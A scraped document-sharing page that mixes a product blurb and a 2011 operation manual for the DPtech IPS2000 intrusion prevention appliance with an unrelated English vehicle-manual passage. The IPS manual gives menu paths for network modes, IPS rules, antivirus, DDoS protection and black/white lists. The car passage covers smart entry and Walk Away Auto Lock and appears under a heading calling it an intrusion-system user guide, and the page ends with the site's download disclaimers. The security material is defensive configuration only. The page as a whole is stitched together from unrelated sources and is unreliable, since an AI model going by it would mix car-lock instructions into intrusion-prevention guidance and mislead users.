支持 SYN Flood、UDP Flood、ICMP Flood、DNS Query Flood、HTTP Get Flood、CC 攻击等 DDoS 攻击防护
内置 URL 特征库,支持自定义 URL 过滤规则库、基于时间段过滤等
产品系列
IPS2000-MA-N 部署灵活、99.999%的高可靠性设计,适用于 小型网络的数据中心和中型网络出口。
IPS2000-ME-N 部署灵活、99.999%的高可靠性设计,适用于 中小型网络的数据中心和中型网络出口。
IPS2000-GS-N 部署灵活、99.999%的高可靠性设计,适用于 中型网络的数据中心和大型网络出口。
智能入侵系统用户指南说明书
Smart Entry SystemWhen you carry the remote transmitter, in a pocket or purse and it is outside the vehicle and within range (about 32 inches or 80 cm), you can lock or unlock the doors, fuel fill door, and open the trunk without handling the transmitter.n Unlocking/Locking the Doors and TrunkTo unlock: Grab the driver’s door handle to unlock the driver’s door and the fuel fill door. Grab the front passenger’s door handle to unlock all the doors. You can customize this feature’s behavior.Press the trunk release button.VEHICLE CONTROLSTo lock: Press the door lock sensor on the front door.Note: System range is affected by radio signals from other devices (for example, cell phones or tablets) so for best results, carry the remote transmitter separately from these devices.n Customizing Door Lock and Unlock SettingsCustomize the auto door lock and unlock settings to your preference.Models with Color AudioUsing the Audio/Information Screen1.Press the MENU/CLOCK button, then select Settings .2.Select Vehicle Settings .3.Select Door/Window Setup .4.Select Auto Door Lock or Auto Door Unlock to customize.Models with Display AudioUsing the Audio/Information Screen1.Press the Home button.2.Select Settings .3.Select Vehicle .4.Select Door/Window Setup .5.Select Auto Door Lock or Auto Door Unlockto customize.VEHICLE CONTROLSn Walk Away Auto Lock ®When you walk away from the vehicle while carrying the remote transmitter, the doors and trunk automatically lock if the following conditions are met:•The remote transmitter is within a range of 5 feet (1.5 m).•All doors and the trunk are closed.•There are no remote transmitters inside the vehicle.Follow these steps:1.Exit the vehicle, close the door and stay near it. Listen for a beep. The system is activated.2.Walk at least 5 feet (1.5 m) away.3.Listen for a beep and look for the lights to flash. The doors lock.The auto lock function is set to OFF as the factory default setting. It can be set to ON using the audio/information screen. If you set the auto lock function to ON, only the remote transmitter that was used to unlock the driver's door prior to the setting change can activate auto lock. To turn on this feature, follow the steps below:Models with Display AudioUsing the Audio/Information Screen1.Press the HOME button then select Settings .2.Select Vehicle .3.Select Door/Window Setup .4.Select Walk Away Auto Lock ®, then selectON.VEHICLE CONTROLS。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
DPtech IPS2000操作手册
杭州迪普科技有限公司
2011年08月
目录
DPtech IPS2000操作手册 (1)
第1章组网模式 (1)
组网模式1—透明模式 (1)
网络拓扑 (1)
配置步骤 (1)
组网模式2—透明桥接模式 (2)
网络拓扑 (2)
配置步骤 (2)
组网模式3—旁路模式 (3)
网络拓扑 (3)
配置步骤 (3)
第2章 IPS攻击防护 (4)
实现功能 (4)
网络拓扑 (4)
配置步骤 (4)
第3章 AV防病毒 (6)
实现功能 (6)
网络拓扑 (6)
配置步骤 (6)
第4章 DDOS防护 (8)
连接数限制 (8)
实现功能 (8)
网络拓扑 (8)
配置步骤 (8)
DD OS防护 (9)
实现功能 (9)
网络拓扑 (9)
配置步骤 (9)
高级DD OS防护 (10)
实现功能 (10)
网络拓扑 (11)
配置步骤 (11)
第5章综合防御 (12)
基本攻击防护 (12)
实现功能 (12)
网络拓扑 (12)
配置步骤 (12)
黑/白名单 (13)
实现功能 (13)
网络拓扑 (13)
配置步骤 (13)
第6章备注 (15)
第1章组网模式
1.1 组网模式1—透明模式
1.1.1 网络拓扑
说明:此模式适用于设备串接在现有网络中使用,不改变网络拓扑,增加安全功能。
只能使用带外管理方式(即:/24)
1.1.2 配置步骤
在【基本】->【网络管理】->【组网模式】下,选择透明模式
1.2 组网模式2—透明桥接模式
1.2.1 网络拓扑
说明:此模式在透明模式的基础上,提供了认证功能和带内管理功能。
可以使用带内和带外两种管理方式(即:/24或/24,带内、带外地址不能冲突)
1.2.2 配置步骤
在【基本】->【网络管理】->【组网模式】下,选择透明桥接模式
1.3 组网模式3—旁路模式
1.3.1 网络拓扑
说明:此模式下,旁路接口不存在接口对概念,只对镜像流量只做检测,无动作
1.3.2 配置步骤
在【基本】->【网络管理】->【组网模式】下,选择旁路模式
第2章IPS攻击防护
2.1 实现功能
攻击者发起攻击,攻击动作被IPS阻断,并产生阻断日志,在本地IPS日志显示,或输出到UMC
2.2 网络拓扑
2.3 配置步骤
在【基本】->【IPS】->【IPS规则】下,添加IPS规则
在【基本】->【IPS】->【IPS规则】下,添加IPS策略
在【基本】->【日志管理】->【业务日志】下,将日志输出到UMC(如已安装UMC)
说明:IPS还原点,根据防护内容不同,创建多个IPS还原点,可快速切换至不同的IPS策略
第3章AV防病毒
3.1 实现功能
被攻击者从攻击者处下载病毒,病毒文件被IPS阻断,并产生阻断日志,在本地防病毒日志显示,或输出到UMC
3.2 网络拓扑
3.3 配置步骤
在【基本】->【防病毒】->【防病毒策略】下,添加AV策略
在【基本】->【日志管理】->【业务日志】下,将日志输出到UMC(如已安装UMC)
第4章DDos防护
4.1 连接数限制
4.1.1 实现功能
按照一定参数进行连接数限速,或P2P限速(为全局限速)
4.1.2 网络拓扑
4.1.3 配置步骤
在【基本】->【网络管理】->【网络用户组】下,添加IP用户组
在【业务】->【DDos防护】->【连接数量超限控制】下,添加连接数限速策略
4.2 DDos防护
4.2.1 实现功能
攻击者对服务器进行DDos攻击,IPS对其进行学习或防护,并查看流量趋势及防护快照
4.2.2 网络拓扑
4.2.3 配置步骤
在【业务】->【DDos防护】->【IPv4基本DDos防护】->【防护目标管理】下,创建防护对象
在【业务】->【DDos防护】->【IPv4基本DDos防护】->【防护目标配置和趋势图】下,进行DDos攻击防护设置
4.3 高级DDos防护
4.3.1 实现功能
攻击者对服务器进行DDos攻击,IPS对其进行学习或防护,并查看流量趋势图及防护历史
4.3.2 网络拓扑
4.3.3 配置步骤
在【业务】->【DDos防护】->【高级DDos防护】->【防护目标配置和趋势图】下,新建防护配置
第5章综合防御
5.1 基本攻击防护
5.1.1 实现功能
攻击者进行基本攻击(LAND攻击、死亡之PING、IP分片、探测扫描等),IPS将其阻断并生成日志,对扫描类攻击可自动推送至黑名单
5.1.2 网络拓扑
5.1.3 配置步骤
在【业务】->【综合防御】->【基本攻击防护】下,配置基本攻击防护策略
5.2 黑/白名单
5.2.1 实现功能
通过手动添加,或者自动添加方式进行黑白名单策略匹配
5.2.2 网络拓扑
5.2.3 配置步骤
在【业务】->【综合防御】->【黑/白名单】下,手动开启黑/白名单功能
在【业务】->【综合防御】->【基本攻击防护】下,配置扫描攻击推送黑名单策略
第6章备注
访问控制、审计分析功能,参见UAG操作手册。